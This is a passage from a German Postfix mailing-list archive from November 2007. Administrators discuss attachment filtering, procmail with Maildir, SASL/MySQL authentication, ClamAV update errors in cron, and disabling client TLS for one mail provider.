Partition gemounted ist? Oder reif für eine Überprüfung? Kritisch wird es wenn sowas kommt: Filesystem state: not clean with errors Mit freundlichem Gruß Peter Bauernfeind From joe at pdi-berlin.de Thu Nov 29 14:28:18 2007 From: joe at pdi-berlin.de (Joachim Schoenberg) Date: Thu, 29 Nov 2007 14:28:18 +0100 Subject: [Postfixbuch-users] zip und exe dateien in e-mail zulassen In-Reply-To: <001901c831e2$54e73e70$0565a8c0@uwe> References: <20071128162601.148980@gmx.net> <9D3A50FC-F3D6-479E-BF11-1212B01D1B7C@matthias-balke.de> <001901c831e2$54e73e70$0565a8c0@uwe> Message-ID: <200711291428.18665.joe@pdi-berlin.de> Hallo, Am Mittwoch, 28. November 2007 schrieb Uwe Driessen: > In der Regel sollte man zip mit exe in einem eigenen Bereich auf der HP > bereitstellen und nur den downloadlink versenden. > Bei 0 Tagen Vorwarnzeit bzw. in der Zwischenzeit sind Trojaner und Viren in > einer Stunde um den Erdball lasse ich hier auch keinen solchen Versand zu. > Weder eingehend noch ausgehend. > Jede ausführbare Datei auch im Anhang und gezipt stellt ein > Sicherheitsrisiko dar. Und bevor jetzt wieder kommt bei möchte ich nicht > Kunde sein die Firmen und Vereine haben dieses Sicherheitsfeature begrüßt > und akzeptiert (ich habe zwar vorher immer so um die 50 - 200 ? mit den > verseuchten Rechnern verdient aber was soll's). Da kann ich Uwe nur beipflichten. Das Verbieten von EXE, PIF, SCR usw. ist eine gute Unterstützung des Virenscanners in Amavisd-new, da die Updates ja prinzipbedingt immer verspätet eintrudeln. Wir nennen das "Nachbrenner des Virenscanners" ;-) Mails vom Typ "banned" werden an ein spezielles Postfach der Empfänger-Domain weitergeleitet. Dort kann es der lokale Admin auf Nachfrage des Empfängers zustellen. Alternativ könnte man zur Übertragung solcher Dateien auch ein ZIP mit Passwort benutzen, aber es gab ja auch schon passwortgeschützte Viren :-( Joe -- ----------------------------------- Joachim Schoenberg Paul-Drude-Institut for Solid State Electronics, Berlin ----------------------------------- From cscholz at 2nibbles4u.de Thu Nov 29 14:29:17 2007 From: cscholz at 2nibbles4u.de (Christian Scholz) Date: Thu, 29 Nov 2007 14:29:17 +0100 Subject: [Postfixbuch-users] Filesystem state: "not clean" In-Reply-To: <474EB87D.5070805@reba-eno.de> References: <63908DA348933441A6FB2AB998ED894F0196E2@dcex01.2nibbles4u.local> <474EB87D.5070805@reba-eno.de> Message-ID: <63908DA348933441A6FB2AB998ED894F0196E3@dcex01.2nibbles4u.local> > > > > bash ~ # tune2fs -l /dev/md0 > > tune2fs 1.40-WIP (14-Nov-2006) > > Filesystem volume name: boot > > Last mounted on: > > ... > > Filesystem state: not clean > > ^^^^^^ > > > > > Hmmm, heißt das nicht, daß die Partition gemounted ist? Oder reif für > eine Überprüfung? > > Kritisch wird es wenn sowas kommt: > > Filesystem state: not clean with errors > Ist die Boot Partition... also gemounted. Die Root Partition sagt: tune2fs 1.40-WIP (14-Nov-2006) ... Filesystem state: clean Errors behavior: Continue ... Gruß Christian Scholz From peter.bauernfeind at reba-eno.de Thu Nov 29 14:40:58 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Thu, 29 Nov 2007 14:40:58 +0100 Subject: [Postfixbuch-users] Filesystem state: "not clean" In-Reply-To: <63908DA348933441A6FB2AB998ED894F0196E3@dcex01.2nibbles4u.local> References: <63908DA348933441A6FB2AB998ED894F0196E2@dcex01.2nibbles4u.local> <474EB87D.5070805@reba-eno.de> <63908DA348933441A6FB2AB998ED894F0196E3@dcex01.2nibbles4u.local> Message-ID: <474EC16A.6080204@reba-eno.de> Christian Scholz schrieb: >>> bash ~ # tune2fs -l /dev/md0 >>> tune2fs 1.40-WIP (14-Nov-2006) >>> Filesystem volume name: boot >>> Last mounted on: >>> ... >>> Filesystem state: not clean >>> ^^^^^^ >>> >>> >> Hmmm, heißt das nicht, daß die Partition gemounted ist? Oder reif für >> eine Überprüfung? >> >> Kritisch wird es wenn sowas kommt: >> >> Filesystem state: not clean with errors >> >> > > Ist die Boot Partition... also gemounted. Die Root Partition sagt: > > tune2fs 1.40-WIP (14-Nov-2006) > ... > Filesystem state: clean > Errors behavior: Continue > ... > Mounted? Ansonst, du guckst hier: http://www.clever-linux.de/LinuxGrundlagen/filesys.htm und suchst nach "Journal - Protokollierung des Dateizugriffs". Anschließend nach "e2fsck - Routineuntersuchungen" Mit freundlichem Gruß Peter Bauernfeind From driessen at fblan.de Thu Nov 29 14:53:49 2007 From: driessen at fblan.de (Uwe Driessen) Date: Thu, 29 Nov 2007 14:53:49 +0100 Subject: [Postfixbuch-users] zip und exe dateien in e-mail zulassen In-Reply-To: <200711291428.18665.joe@pdi-berlin.de> References: <20071128162601.148980@gmx.net><9D3A50FC-F3D6-479E-BF11-1212B01D1B7C@matthias-balke.de><001901c831e2$54e73e70$0565a8c0@uwe> <200711291428.18665.joe@pdi-berlin.de> Message-ID: <002e01c8328f$45365580$0565a8c0@uwe> Joachim Schoenberg schrieb: > Alternativ könnte man zur Übertragung solcher Dateien auch > ein ZIP mit Passwort benutzen, aber es gab ja auch schon > passwortgeschützte Viren :-( Öhm ich glaube die nimmt meiner auch nicht bzw. lässt die nicht durch. Keine Ahnung an was Amavis das erkennt. Da das aber jeder der Kunden weis versuchen die das gar nicht erst > > Joe Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From cite at incertum.net Thu Nov 29 15:28:08 2007 From: cite at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Thu, 29 Nov 2007 15:28:08 +0100 Subject: [Postfixbuch-users] LDAP-Lookup und Ausfallsicherheit In-Reply-To: <474D3E93.7040207@TMI-RZ.de> References: <474D3E93.7040207@TMI-RZ.de> Message-ID: <20071129142808.GH12941@mail.incertum.net> * Thomas Stiefel wrote: > Variante A: > Ich könnte auf dem internen Domino-Server DOM1 im Intranet auch einen > LDAP-Server aktivieren und diesen als 2. Ziel für den Lookup > konfigurieren. Wobei sich hier die Frage stellt wie man das am besten > konfiguriert. Die einfachste wäre wohl ein DNS-Alias, der auf beide > Server zeigt und somit sollte Postfix dann hoffentlich automatisch auf > DOM1 zugreifen, wenn DOM2 down ist. > > Variante B: > Ich habe in einer Mail von Sandy gelesen, dass man wohl auch per Script > das LDAP-Directory abfragen und das Ergebnis in eine Hash-DB schreiben > kann. Es müsste hier allerdings neben der Internet-Adresse auch das Feld > Kurzname aus dem Domino-Directory mit abgefragt werden. > > Die LDAP-Query für Postfix lautet: query_filter = > (|(mail=%s)(uid=%u)(uid=%s)) In der DMZ einen OpenLDAP hinstellen und die Daten vom Domino replizieren lassen fällt wohl aus, oder? Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #271: Usenet - Eine Diktatur von Newsserverbetreiber, die größtenteils auf das nörgelnde Volk hört (so es sich denn einig ist). (Cornell Binder) From Andre.Huebner at gmx.de Thu Nov 29 17:11:48 2007 From: Andre.Huebner at gmx.de (=?iso-8859-1?Q?Andre_H=FCbner?=) Date: Thu, 29 Nov 2007 17:11:48 +0100 Subject: [Postfixbuch-users] postfix umschalten auf Maildir References: <003601c8327c$04a317f0$f91310ac@nmm.local> <20071129113831.GI31090@charite.de><007401c83282$1cd864a0$f91310ac@nmm.local><474EB013.20102@reba-eno.de> <009f01c83283$c364b200$f91310ac@nmm.local> Message-ID: <000801c832a2$8ba0ef90$de1310ac@nmm.local> Hallo, mit procmail (formail)hab ich grad doch noch ein Problem an dem ich nun schon eine weile rumbastel. Mit postfix/procmail im mbox konnte ich diese procmailfilter problemlos einsetzen. Hier ein Beispiel: :0 * ^From.*gmx.de | (formail -t -I"procmail: gmx.de") >> /var/spool/mail/ein_postfach Nun habe ich das Problem das ich als Ziel statt des Postfaches für das mbox Format ja den Ordner für das Maildir angeben muß. z.B.: /home/popuser/username/Maildir/new Ich habe an der Stelle keinen Dateinamen an den ich die Ausgabe der ganzen Operation als neue Mail anhängen kann. formail beschwert sich das es einen Ordner bekommen hat. Ich habe leider aktuell keine Option gefunden dies der procmail/formail Kombination klar zu machen. Was kann ich tun? Hab ich was übersehen? Danke André ----- Original Message ----- From: "Andre Hübner" To: "Eine Diskussionsliste rund um das Postfix-Buch von Peer Heinlein." Sent: Thursday, November 29, 2007 1:31 PM Subject: Re: [Postfixbuch-users] postfix umschalten auf Maildir Hallo, genügt bei mir leider nicht. Ich bin auf procmail angewiesen um weitere Mailfilterungen etc. durchzuführen. Bin aktuell noch am testen ob das noch so funktioniert wie es soll, aber ich hab ein gutes Gefühl ;) André ----- Original Message ----- From: "Peter Bauernfeind" To: "Eine Diskussionsliste rund um das Postfix-Buch von Peer Heinlein." Sent: Thursday, November 29, 2007 1:26 PM Subject: Re: [Postfixbuch-users] postfix umschalten auf Maildir Andre Hübner schrieb: > mailbox_command = /usr/bin/procmail -a "$EXTENSION" DEFAULT=$HOME/Maildir/ > MAILDIR=$HOME/Maildir > > Bei mir funktioniert das so: home_mailbox = maildir/ #mailbox_command = procmail -a "$EXTENSION" Hier bei mir hat es gereicht procmail auszukommentieren. Mit freundlichem Gruß Peter Bauernfeind -- _______________________________________________ Postfixbuch-users -- http://www.postfixbuch.de Heinlein Professional Linux Support GmbH Postfixbuch-users at listi.jpberlin.de https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users -- _______________________________________________ Postfixbuch-users -- http://www.postfixbuch.de Heinlein Professional Linux Support GmbH Postfixbuch-users at listi.jpberlin.de https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users From mrg at unimx.de Thu Nov 29 18:11:35 2007 From: mrg at unimx.de (mrg at unimx.de) Date: Thu, 29 Nov 2007 18:11:35 +0100 Subject: [Postfixbuch-users] Spamassassin / amavisd-new im SMTP-Dialog bzw kurz danach Message-ID: <00a501c832aa$e57469e0$b05d3da0$@de> Hallo Gruppe, ich möchte Spamassassin schon im SMTP Dialog bzw. kurz danach (da ja im SMTP Dialog noch keine Maildaten gesendet werden) die Mail ablehnt. Die Mail soll also nicht ?gequeued? werden! Geht das? Derzeit ist Spamassassin via content-filter über amavisd-new angebunden, funktioniert soweit super. Im Exim gibt?s da wohl ein content-scanning, im Postfix gibt?s ja auch div. Maps wie body_check etc. Bin für Tipps dankbar. Google hat mich nicht weiter gebracht. Postfix: 2.2.9 SA: 3.002003 Amavisd: 2.5.2 / 20070627 Grüße Martin -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From ml at awinkelmann.de Thu Nov 29 18:51:16 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Thu, 29 Nov 2007 18:51:16 +0100 Subject: [Postfixbuch-users] Spamassassin / amavisd-new im SMTP-Dialog bzw kurz danach In-Reply-To: <00a501c832aa$e57469e0$b05d3da0$@de> References: <00a501c832aa$e57469e0$b05d3da0$@de> Message-ID: <200711291851.17251.ml@awinkelmann.de> On Donnerstag, 29. November 2007, mrg at unimx.de wrote: > ich möchte Spamassassin schon im SMTP Dialog bzw. kurz danach (da ja im > SMTP Dialog noch keine Maildaten gesendet werden) die Mail ablehnt. > > Die Mail soll also nicht ?gequeued? werden! Geht das? http://www.postfix.org/SMTPD_PROXY_README.html -- Andreas From gregor at a-mazing.de Thu Nov 29 18:55:43 2007 From: gregor at a-mazing.de (Gregor Hermens) Date: Thu, 29 Nov 2007 18:55:43 +0100 Subject: [Postfixbuch-users] Spamassassin / amavisd-new im SMTP-Dialog bzw kurz danach In-Reply-To: <00a501c832aa$e57469e0$b05d3da0$@de> References: <00a501c832aa$e57469e0$b05d3da0$@de> Message-ID: <200711291855.43352@office.a-mazing.net> Hallo Martin, Am Donnerstag, 29. November 2007 schrieb mrg at unimx.de: > ich möchte Spamassassin schon im SMTP Dialog bzw. kurz danach (da ja im > SMTP Dialog noch keine Maildaten gesendet werden) die Mail ablehnt. > > Die Mail soll also nicht ?gequeued? werden! Geht das? http://www.postfix.org/SMTPD_PROXY_README.html Gruß, Gregor -- @mazing fon +49 8142 6528665 Gregor Hermens fax +49 8142 6528669 Brucker Strasse 12 gregor.hermens at a-mazing.de D-82216 Gernlinden http://www.a-mazing.de/ From Rainer.Wiesenfarth at inpho.de Thu Nov 29 23:26:20 2007 From: Rainer.Wiesenfarth at inpho.de (Rainer Wiesenfarth) Date: Thu, 29 Nov 2007 23:26:20 +0100 Subject: [Postfixbuch-users] (OT) ERROR: Malformed database In-Reply-To: <474EB4FA.60804@jkart.de> References: <474DBEE1.9070204@jkart.de> <474E585B.6030501@inpho.de> <474EB4FA.60804@jkart.de> Message-ID: <474F3C8C.8080905@inpho.de> Jim Knuth schrieb: > Am 29.11.2007 7:12 Uhr, schrieb Rainer Wiesenfarth: >> Jim Knuth schrieb: >>> ich bekomme sporadisch von Cron folgendes beim >>> Update von SaneSecurity: >>> >>> --snip >>> LibClamAV Error: Problem parsing database at line 1 >>> LibClamAV Error: Can't load /var/tmp/clamdb/scam.ndb: Malformed database >>> ERROR: Malformed database >>> [...] >>> --snap >>> >>> Wenn ich dann auf die Console gehe und den Befehl händisch "loslasse" >>> ist aber alles in Ordnung. >> Hmm, wenn Konsole funktioniert, aber cron nicht dann kann es eigentlich >> nur an zwei Dingen liegen: >> - cron ruft das Kommando mit einer anderen uid auf und die >> Zugriffsrechte passen nicht oder >> - in der interaktiven Sitzung sieht das Environment anders aus, sodass >> ein anderes Kommando oder andere Daten verwendet werden > > ok. Aber es kommt ja NUR sporadisch. Manchmal 1x am Tag, manchmal > 3x, und manchmal gar nicht. Na denn: Treten sich da vielleicht manchmal zwei Prozesse gegenseitig auf die Füße? Kommt die Fehlermeldung vom cron-Job oder vom laufenden Daemon? Gibt es eine Möglichkeit, den einen "hinzustellen", während der andere an der DB werkelt? Alles nur so Ideen, ohne den Anspruch, hilfreich zu sein. Best Regards / Mit freundlichen Grüßen Rainer Wiesenfarth -- INPHO GmbH * Smaragdweg 1 * 70174 Stuttgart * Germany phone: +49 711 2288 10 * fax: +49 711 2288 111 * web: www.inpho.de place of business: Stuttgart * managing director: Johannes Saile commercial register: Stuttgart, HRB 9586 Leader in Photogrammetry and Digital Surface Modelling -------------- nächster Teil -------------- Ein Dateianhang mit Binärdaten wurde abgetrennt... Dateiname : smime.p7s Dateityp : application/x-pkcs7-signature Dateigröße : 3277 bytes Beschreibung: S/MIME Cryptographic Signature URL : From jk at jkart.de Thu Nov 29 23:40:06 2007 From: jk at jkart.de (Jim Knuth) Date: Thu, 29 Nov 2007 23:40:06 +0100 Subject: [Postfixbuch-users] (OT) ERROR: Malformed database In-Reply-To: <474F3C8C.8080905@inpho.de> References: <474DBEE1.9070204@jkart.de> <474E585B.6030501@inpho.de> <474EB4FA.60804@jkart.de> <474F3C8C.8080905@inpho.de> Message-ID: <474F3FC6.50408@jkart.de> Am 29.11.2007 23:26 Uhr, schrieb Rainer Wiesenfarth: > Jim Knuth schrieb: >> Am 29.11.2007 7:12 Uhr, schrieb Rainer Wiesenfarth: >>> Jim Knuth schrieb: >>>> ich bekomme sporadisch von Cron folgendes beim >>>> Update von SaneSecurity: >>>> >>>> --snip >>>> LibClamAV Error: Problem parsing database at line 1 >>>> LibClamAV Error: Can't load /var/tmp/clamdb/scam.ndb: Malformed >>>> database >>>> ERROR: Malformed database >>>> [...] >>>> --snap >>>> >>>> Wenn ich dann auf die Console gehe und den Befehl händisch >>>> "loslasse" ist aber alles in Ordnung. >>> Hmm, wenn Konsole funktioniert, aber cron nicht dann kann es >>> eigentlich nur an zwei Dingen liegen: >>> - cron ruft das Kommando mit einer anderen uid auf und die >>> Zugriffsrechte passen nicht oder >>> - in der interaktiven Sitzung sieht das Environment anders aus, >>> sodass ein anderes Kommando oder andere Daten verwendet werden >> >> ok. Aber es kommt ja NUR sporadisch. Manchmal 1x am Tag, manchmal 3x, >> und manchmal gar nicht. > > Na denn: Treten sich da vielleicht manchmal zwei Prozesse gegenseitig > auf die Füße? Kommt die Fehlermeldung vom cron-Job oder vom laufenden > Daemon? es gibt keinen Dämon. Ist ein Script, was von Cron in X Abstand ausgeführt wird. > Gibt es eine Möglichkeit, den einen "hinzustellen", während der > andere an der DB werkelt? > > Alles nur so Ideen, ohne den Anspruch, hilfreich zu sein. > > Best Regards / Mit freundlichen Grüßen > Rainer Wiesenfarth > -- mit freundlichem Gruss - with kind regard Jim Knuth #ICQ 277289867 From pinguin at tuxolino.net Fri Nov 30 08:21:01 2007 From: pinguin at tuxolino.net (Michael G. Schmidt) Date: Fri, 30 Nov 2007 08:21:01 +0100 Subject: [Postfixbuch-users] cyrus-sasl2 - hier: tls deaktivieren Message-ID: <474FB9DD.8080806@tuxolino.net> Guten M:)rgen Liste! Dies ist mein erstes Posting hier und ich hoffe den richtigen 'Ton' zu treffen. Mein Problem ist folgendes: Ich nutze debian etch 4.0r1 und habe mir postfix installiert. Zusaetzlich nutze ich cyrus-sasl2 mit saslauthd. Mein Mailprovider verlangt eine smtp-auth (Versatel) und laesst sich nur auf LOGIN oder PLAIN ein. Bei meiner Installation scheint cyrus-sasl2 automatisch tls zu verwenden, so dass meine Authentifikation nicht akzeptiert wird. Versucht dies zu aendern habe ich in der '/etc/default/saslauthd' und in der /etc/postfix/main.cf. Leider ohne Erfolg. Kann mir jemand einen Tipp geben wie ich dieses Problem loesen koennte? TIA und viele Gruesse, Michael From lists at puersten.de Fri Nov 30 09:05:33 2007 From: lists at puersten.de (=?ISO-8859-1?Q?Oliver_P=FCrsten?=) Date: Fri, 30 Nov 2007 09:05:33 +0100 Subject: [Postfixbuch-users] SASL mit auxprop und MySQL Backend In-Reply-To: <200711290614.57725.ml@awinkelmann.de> References: <474DBD57.5000203@puersten.de> <474DE4D5.9010907@puersten.de> <474DE60A.6030301@japantest.homelinux.com> <200711290614.57725.ml@awinkelmann.de> Message-ID: <474FC44D.5020100@puersten.de> Andreas Winkelmann schrieb: > On Mittwoch, 28. November 2007, Sandy Drobic wrote: > >>> Also was ich brauch, wenn ich die Abfrage richig verstehe, ist der >>> komplette übergebene username. Im meinem Falls ist es so das username = >>> emailadresse ist. Sprich die Tabelle sasl sieht wie folgt aus: >>> >>> mysql> select * from sasl; >>> +---------------+----------+ >>> >>> | username | password | >>> >>> +---------------+----------+ >>> >>> | test1 at test.de | test | >>> >>> +---------------+----------+ >> Okay, dann passe die sql_select entsprechend an in smtpd.conf: >> sql_select: SELECT password FROM sasl WHERE username = '%s' > > Es gibt kein %s. Der OP müsste das mit '%u@%r' lösen. > Hatte ich auch schon ausprobiert, leider bringt das aber auch kein Ergebnis. Ich denke das Grundproblem wird sein das die Anfrage, warum auch immer, nicht in der Datenbank ankommt. Irgentwer noch ne Idee wieso die Anfrage nicht an die Datenbank weitergegeben wird? Thx Oliver From p at state-of-mind.de Fri Nov 30 09:13:31 2007 From: p at state-of-mind.de (Patrick Ben Koetter) Date: Fri, 30 Nov 2007 09:13:31 +0100 Subject: [Postfixbuch-users] SASL mit auxprop und MySQL Backend In-Reply-To: <474FC44D.5020100@puersten.de> References: <474DBD57.5000203@puersten.de> <474DE4D5.9010907@puersten.de> <474DE60A.6030301@japantest.homelinux.com> <200711290614.57725.ml@awinkelmann.de> <474FC44D.5020100@puersten.de> Message-ID: <20071130081331.GA5529@state-of-mind.de> * Oliver Pürsten : > Andreas Winkelmann schrieb: > > On Mittwoch, 28. November 2007, Sandy Drobic wrote: > > > >>> Also was ich brauch, wenn ich die Abfrage richig verstehe, ist der > >>> komplette übergebene username. Im meinem Falls ist es so das username = > >>> emailadresse ist. Sprich die Tabelle sasl sieht wie folgt aus: > >>> > >>> mysql> select * from sasl; > >>> +---------------+----------+ > >>> > >>> | username | password | > >>> > >>> +---------------+----------+ > >>> > >>> | test1 at test.de | test | > >>> > >>> +---------------+----------+ > >> Okay, dann passe die sql_select entsprechend an in smtpd.conf: > >> sql_select: SELECT password FROM sasl WHERE username = '%s' > > > > Es gibt kein %s. Der OP müsste das mit '%u@%r' lösen. > > > > Hatte ich auch schon ausprobiert, leider bringt das aber auch kein Ergebnis. > > Ich denke das Grundproblem wird sein das die Anfrage, warum auch immer, > nicht in der Datenbank ankommt. > > Irgentwer noch ne Idee wieso die Anfrage nicht an die Datenbank > weitergegeben wird? Mehrere Fehler nacheinander? Mit tcpdump mitschneiden und mit Wireshark auswerten. p at rick > > Thx > Oliver > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listi.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users -- Postfix - Einrichtung, Betrieb und Wartung saslfinger (debugging SMTP AUTH): From p at state-of-mind.de Fri Nov 30 09:20:23 2007 From: p at state-of-mind.de (Patrick Ben Koetter) Date: Fri, 30 Nov 2007 09:20:23 +0100 Subject: [Postfixbuch-users] cyrus-sasl2 - hier: tls deaktivieren In-Reply-To: <474FB9DD.8080806@tuxolino.net> References: <474FB9DD.8080806@tuxolino.net> Message-ID: <20071130082023.GB5529@state-of-mind.de> * Michael G. Schmidt : > Guten M:)rgen Liste! > Dies ist mein erstes Posting hier und ich hoffe den richtigen 'Ton' zu > treffen. > Mein Problem ist folgendes: Ich nutze debian etch 4.0r1 und habe mir > postfix installiert. Zusaetzlich nutze ich cyrus-sasl2 mit saslauthd. > Mein Mailprovider verlangt eine smtp-auth (Versatel) und laesst sich nur > auf LOGIN oder PLAIN ein. saslauthd brauchst Du nur, wenn _dein_ Server AUTH anbieten soll. Kannst Du also für die Authentifizierung bei Versatel ignorieren. > Bei meiner Installation scheint cyrus-sasl2 automatisch tls zu > verwenden, so dass meine Authentifikation nicht akzeptiert wird. > Versucht dies zu aendern habe ich in der '/etc/default/saslauthd' und in > der /etc/postfix/main.cf. Leider ohne Erfolg. > Kann mir jemand einen Tipp geben wie ich dieses Problem loesen koennte? > TIA und viele Gruesse, Per default ist die Postfix Security Policy für SMTP AUTH im Client keine PLaintext-Mechanismen zuzulassen: # postconf - d smtp_sasl_security_options smtp_sasl_security_options = noplaintext, noanonymous Setze das in main.cf: smtp_sasl_security_options = noanonymous Dann sollte es gehen. p at rick > Michael > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listi.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users -- Postfix - Einrichtung, Betrieb und Wartung saslfinger (debugging SMTP AUTH): From cite at incertum.net Fri Nov 30 09:22:23 2007 From: cite at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Fri, 30 Nov 2007 09:22:23 +0100 Subject: [Postfixbuch-users] cyrus-sasl2 - hier: tls deaktivieren In-Reply-To: <474FB9DD.8080806@tuxolino.net> References: <474FB9DD.8080806@tuxolino.net> Message-ID: <20071130082223.GJ12941@mail.incertum.net> * "Michael G. Schmidt" wrote: > Bei meiner Installation scheint cyrus-sasl2 automatisch tls zu > verwenden, so dass meine Authentifikation nicht akzeptiert wird. > Versucht dies zu aendern habe ich in der '/etc/default/saslauthd' und in > der /etc/postfix/main.cf. Leider ohne Erfolg. > Kann mir jemand einen Tipp geben wie ich dieses Problem loesen koennte? Obwohl ich nicht behaupten kann, das Problem zu verstehen: Dem SMTP-Client in Postfix gewöhnt man TLS ab 2.4 mit smtp_tls_security_level = never ab. Mehr dazu unter: http://www.postfix.org/TLS_README.html Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #318: MCSP - Doppelklickathleten. (Juergen P. Meier) From pinguin at tuxolino.net Fri Nov 30 09:31:04 2007 From: pinguin at tuxolino.net (Michael G. Schmidt) Date: Fri, 30 Nov 2007 09:31:04 +0100 Subject: [Postfixbuch-users] cyrus-sasl2 - hier: tls deaktivieren In-Reply-To: <20071130082023.GB5529@state-of-mind.de> References: <474FB9DD.8080806@tuxolino.net> <20071130082023.GB5529@state-of-mind.de> Message-ID: <474FCA48.2000900@tuxolino.net> Patrick Ben Koetter schrieb: > * Michael G. Schmidt : > >> Guten M:)rgen Liste! >> Dies ist mein erstes Posting hier und ich hoffe den richtigen 'Ton' zu >> treffen. >> Mein Problem ist folgendes: Ich nutze debian etch 4.0r1 und habe mir >> postfix installiert. Zusaetzlich nutze ich cyrus-sasl2 mit saslauthd. >> Mein Mailprovider verlangt eine smtp-auth (Versatel) und laesst sich nur >> auf LOGIN oder PLAIN ein. >> > > saslauthd brauchst Du nur, wenn _dein_ Server AUTH anbieten soll. Kannst Du > also für die Authentifizierung bei Versatel ignorieren. > > >> Bei meiner Installation scheint cyrus-sasl2 automatisch tls zu >> verwenden, so dass meine Authentifikation nicht akzeptiert wird. >> Versucht dies zu aendern habe ich in der '/etc/default/saslauthd' und in >> der /etc/postfix/main.cf. Leider ohne Erfolg. >> Kann mir jemand einen Tipp geben wie ich dieses Problem loesen koennte? >> TIA und viele Gruesse, >> > > Per default ist die Postfix Security Policy für SMTP AUTH im Client keine > PLaintext-Mechanismen zuzulassen: > > # postconf - d smtp_sasl_security_options > smtp_sasl_security_options = noplaintext, noanonymous > > Setze das in main.cf: > smtp_sasl_security_options = noanonymous > > Dann sollte es gehen. > > p at rick > > > >> Michael >> -- >> _______________________________________________ >> Postfixbuch-users -- http://www.postfixbuch.de >> Heinlein Professional Linux Support GmbH >> >> Postfixbuch-users at listi.jpberlin.de >> https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users >> > > Hallo Patrick, danke fuer den Hinweis! :) Den von Dir gemachten Vorschlag fuer den main.cf Eintrag habe ich schon so drinnen, es klappt dennoch nicht. Gruss, Michael From pinguin at tuxolino.net Fri Nov 30 10:13:03 2007 From: pinguin at tuxolino.net (Michael G. Schmidt) Date: Fri, 30 Nov 2007 10:13:03 +0100 Subject: [Postfixbuch-users] geloest - Re: cyrus-sasl2 - hier: tls deaktivieren In-Reply-To: <20071130082223.GJ12941@mail.incertum.net> References: <474FB9DD.8080806@tuxolino.net> <20071130082223.GJ12941@mail.incertum.net> Message-ID: <474FD41F.9070206@tuxolino.net> Stefan Förster schrieb: > * "Michael G. Schmidt" wrote: > >> Bei meiner Installation scheint cyrus-sasl2 automatisch tls zu >> verwenden, so dass meine Authentifikation nicht akzeptiert wird. >> Versucht dies zu aendern habe ich in der '/etc/default/saslauthd' und in >> der /etc/postfix/main.cf. Leider ohne Erfolg. >> Kann mir jemand einen Tipp geben wie ich dieses Problem loesen koennte? >> > > Obwohl ich nicht behaupten kann, das Problem zu verstehen: Dem > SMTP-Client in Postfix gewöhnt man TLS ab 2.4 mit > > smtp_tls_security_level = never > > ab. Mehr dazu unter: http://www.postfix.org/TLS_README.html > > > Ciao > Stefan > Hallo Stefan :) Du scheinst das Richtige "geraten" zu haben ;). Im Testumfeld hat genau dieser Eintrag in der /etc/postfix/main.cf mein Problem geloest. Ich werde es am Wochenende mal im "Echtbetrieb" probieren. Herzlichen Dank! Michael P.S.: Das Problem war, das mein postfix sich mit tls bei meinem Mailprovider authentifzieren wollte. Der akzeptiert jedoch ueberhaupt keine Verschluesselung. Daher wurden meine Mails immer abgewiesen. From oliver.morais at akhwien.at Fri Nov 30 09:53:13 2007 From: oliver.morais at akhwien.at (Morais Oliver) Date: Fri, 30 Nov 2007 09:53:13 +0100 Subject: [Postfixbuch-users] (OT) ERROR: Malformed database In-Reply-To: <474F3FC6.50408@jkart.de> References: <474DBEE1.9070204@jkart.de><474E585B.6030501@inpho.de> <474EB4FA.60804@jkart.de><474F3C8C.8080905@inpho.de> <474F3FC6.50408@jkart.de> Message-ID: > es gibt keinen Dämon. Ist ein Script, was von Cron in X Abstand > ausgeführt wird. Wenn X hinreichend klein ist läuft das Skript vielleicht ein zweites mal los während die vorherige Instanz noch aktiv ist? Passiert dann "zufällig" wenn die Maschine einfach mal mehr zu tun und das Skript so länger läuft? Nur so als schnelle Idee. Gruß, Oliver From p at state-of-mind.de Fri Nov 30 10:57:25 2007 From: p at state-of-mind.de (Patrick Ben Koetter) Date: Fri, 30 Nov 2007 10:57:25 +0100 Subject: [Postfixbuch-users] cyrus-sasl2 - hier: tls deaktivieren In-Reply-To: <20071130082223.GJ12941@mail.incertum.net> References: <474FB9DD.8080806@tuxolino.net> <20071130082223.GJ12941@mail.incertum.net> Message-ID: <20071130095725.GA7310@state-of-mind.de> * Stefan Förster : > * "Michael G. Schmidt" wrote: > > Bei meiner Installation scheint cyrus-sasl2 automatisch tls zu > > verwenden, so dass meine Authentifikation nicht akzeptiert wird. > > Versucht dies zu aendern habe ich in der '/etc/default/saslauthd' und in > > der /etc/postfix/main.cf. Leider ohne Erfolg. > > Kann mir jemand einen Tipp geben wie ich dieses Problem loesen koennte? > > Obwohl ich nicht behaupten kann, das Problem zu verstehen: Dem > SMTP-Client in Postfix gewöhnt man TLS ab 2.4 mit > > smtp_tls_security_level = never smtp_tls_security_level = none > > ab. Mehr dazu unter: http://www.postfix.org/TLS_README.html > > > Ciao > Stefan > -- > Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 > FdI #318: MCSP - Doppelklickathleten. (Juergen P. Meier) > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listi.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users -- Postfix - Einrichtung, Betrieb und Wartung saslfinger (debugging SMTP AUTH): From pinguin at tuxolino.net Fri Nov 30 11:15:42 2007 From: pinguin at tuxolino.net (Michael G. Schmidt) Date: Fri, 30 Nov 2007 11:15:42 +0100 Subject: [Postfixbuch-users] cyrus-sasl2 - hier: tls deaktivieren In-Reply-To: <20071130095725.GA7310@state-of-mind.de> References: 